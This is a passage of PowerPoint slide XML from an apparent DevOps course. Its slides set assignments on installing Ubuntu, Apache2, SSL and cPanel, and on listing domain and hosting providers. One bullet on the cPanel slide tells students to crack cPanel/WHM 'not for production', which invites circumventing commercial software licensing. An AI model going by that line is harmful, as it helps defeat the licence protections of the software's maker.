              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>…..</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4299" name="Google Shape;4299;p697"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2593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#3 Assignments for DevOps</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3120">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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3" name="Shape 4303"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4304" name="Google Shape;4304;p698"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2835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#4 Assignments for DevOps</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3120">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4305" name="Google Shape;4305;p698"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="768900" y="1008625"/>
            <a:ext cx="7943100" cy="39738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6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Install Ubuntu 22.x in VirtualBox/VmWare</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-336550" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Install Apache2 web server</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-336550" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create 5 local domain </a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-336550" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Go to /var/www/html</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-336550" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Open index.html with VIM and delete all lines</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-336550" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Install WinSCP on Host Machine and edit /var/www/html/index.html file with VSCode Editor</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-336550" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Write down the basic structure of HTML5 (HyperText Markup Language)</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-336550" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Setup the SSL certificates</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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9" name="Shape 4309"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4310" name="Google Shape;4310;p699"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2835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#6 Assignments for DevOps</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3120">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4311" name="Google Shape;4311;p699"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="768900" y="1394700"/>
            <a:ext cx="7943100" cy="34353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rgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ubuntu 20.x/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Alma LInux in VirtualBox/VmWare</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-361950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Install</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Cpanel (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://cpanel.net/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-361950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Crack the CPanel/WHM (Not for Production use ;)   )</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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5" name="Shape 4315"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4316" name="Google Shape;4316;p700"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="8854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Where we generally put our website?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3120">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4317" name="Google Shape;4317;p700"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="768900" y="1914625"/>
            <a:ext cx="7943100" cy="2915400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-425450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/home/username/public_html/index.html</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-425450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/var/www/html/index.html</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4318" name="Google Shape;4318;p700"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7512025" y="212400"/>
            <a:ext cx="1427726" cy="406975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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2" name="Shape 4322"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4323" name="Google Shape;4323;p701"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="4413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What is www-data in ubuntu ?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3120">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4324" name="Google Shape;4324;p701"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="768900" y="1394700"/>
            <a:ext cx="7943100" cy="34353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1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Default user and group used by the Apache/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nginx webserver to serve websites.</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4325" name="Google Shape;4325;p701"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7512025" y="212400"/>
            <a:ext cx="1427726" cy="406975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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9" name="Shape 4329"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4330" name="Google Shape;4330;p702"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="495350" y="1026850"/>
            <a:ext cx="7880100" cy="6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920">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t># List Down 10 popular domain provider?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2920">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4331" name="Google Shape;4331;p702"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7207225" y="299150"/>
            <a:ext cx="1658026" cy="472625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4332" name="Google Shape;4332;p702"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="495350" y="1833900"/>
            <a:ext cx="7880100" cy="6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920">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t># List Down 10 popular hosting provider?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2920">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4333" name="Google Shape;4333;p702"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="495350" y="2640950"/>
            <a:ext cx="7880100" cy="6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920">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t># List Down 10 popular SSL Cert provider?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2920">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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7" name="Shape 4337"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4338" name="Google Shape;4338;p703"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="495350" y="1026850"/>
            <a:ext cx="7880100" cy="6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920">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t># List Down 10 popular domain provider?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2920">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4339" name="Google Shape;4339;p703"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7207225" y="299150"/>
            <a:ext cx="1658026" cy="472625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4340" name="Google Shape;4340;p703"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="808775" y="1673225"/>
            <a:ext cx="7511100" cy="30267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6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>www.GoDaddy.com</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>www.HostGator.com</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>One.com</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84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92"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1350925"/>
            <a:ext cx="8520600" cy="572700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="135000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3700">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
